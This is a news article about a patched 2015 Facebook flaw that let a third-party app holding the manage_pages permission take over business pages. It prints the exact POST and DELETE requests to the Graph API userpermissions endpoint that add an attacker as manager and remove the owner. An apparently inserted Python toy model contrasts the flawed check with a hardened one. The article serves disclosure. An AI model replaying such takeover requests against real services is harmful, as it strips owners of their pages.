Facebook Fan pages can be Hijacked by Hackers to take Admin Control

Facebook vulnerability allows hackers to take admin control of the business pages on Facebook

Security researcher Laxman Muthiya has found a serious vulnerability in the way Facebook Business Manager grants access to third-party applications. An attacker holding only the limited permissions of a third-party app can exploit it, and the victim permanently loses admin access to the page.

Detailing his findings on his blog, Laxman states that once the vulnerability is exploited, the attacker can take over admin privileges of a Facebook page and remove the victim.


By default, Facebook's application interface does not allow third-party applications to add or modify page admin roles (page roles such as manager, editor, analyst, etc.). Third-party applications are allowed to perform operations such as posting statuses on your behalf and publishing photos, but not adding admin roles, because an application that could add or remove admins could add some user as admin to the page and remove the actual owner permanently.

However, business pages on Facebook work differently. There is an endpoint for business pages called userpermissions which allows adding or removing page admin roles for users who are already part of the Facebook business. Muthiya found that this endpoint had a vulnerability which could be exploited to take over the victim's business page and remove him/her from admin control.

Laxman found that he could call this endpoint with only the manage_pages permission, using the following request:

POST /PGID/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
role=MANAGER&user=X&business=B&access_token=AAAA...

Page Takeover:

Request:
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>

Response:
true

Removing Victim:

Request:
DELETE /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>

Response:
true

That's all! The target page is taken over.
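To make the flaw concrete, here is an added toy model (written for this article, not Facebook's code) of the authorization decision behind POST and DELETE /<page_id>/userpermissions: the flawed check that trusted any token carrying manage_pages beside a hardened check that refuses app tokens, requires the caller to be a business admin, and never removes the last MANAGER. The token kinds, the BUSINESS_ADMINS map and the sample page, app and user ids are constructed assumptions.

```python
from dataclasses import dataclass, field
ROLES = {"MANAGER", "EDITOR", "ANALYST"}   # page roles named in the article

@dataclass
class Token:
    kind: str      # "app" (third-party application token) or "user"
    subject: str   # app id or user id the token was issued to
    scopes: set = field(default_factory=set)

@dataclass
class Page:
    page_id: str
    business_id: str
    roles: dict = field(default_factory=dict)   # user id -> role

BUSINESS_ADMINS = {"B": {"owner"}}   # constructed: business id -> its admin user ids
def vulnerable_userpermissions(page, token, method, user, role="MANAGER"):
    """Flawed logic: any token carrying manage_pages may add or remove page admins."""
    if "manage_pages" not in token.scopes:
        return False
    if method == "POST" and role in ROLES:
        page.roles[user] = role
        return True
    if method == "DELETE":
        page.roles.pop(user, None)
        return True
    return False

def hardened_userpermissions(page, token, method, user, role="MANAGER"):
    """Hardened: app tokens refused, caller must be a business admin, last MANAGER stays."""
    if token.kind != "user" or token.subject not in BUSINESS_ADMINS.get(page.business_id, set()):
        return False
    if method == "POST" and role in ROLES:
        page.roles[user] = role
        return True
    if method == "DELETE":
        managers = {u for u, r in page.roles.items() if r == "MANAGER"}
        if managers == {user}:
            return False   # refuse to strand the page without any admin
        page.roles.pop(user, None)
        return True
    return False

def owner_survives(handler):
    """Replays the write-up's two requests through a handler; True if the owner keeps MANAGER."""
    page = Page("PGID", "B", {"owner": "MANAGER"})
    app_token = Token("app", "attacker_app", {"manage_pages"})
    handler(page, app_token, "POST", "X", "MANAGER")
    handler(page, app_token, "DELETE", "owner")
    return page.roles.get("owner") == "MANAGER"
```

Running owner_survives against each handler shows the flawed version strips the owner while the hardened version leaves the page untouched.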

Muthiya contacted the Facebook security team about the vulnerability. Facebook confirmed the vulnerability and awarded him a bug bounty of $2500.00. The vulnerability has been patched by Facebook.

Proof of concept video and write-up (posted by 7xter on Wednesday, August 26, 2015; status: fixed, reward $2500 USD): https://www.7xter.com/2015/08/hacking-facebook-pages.html

vijay
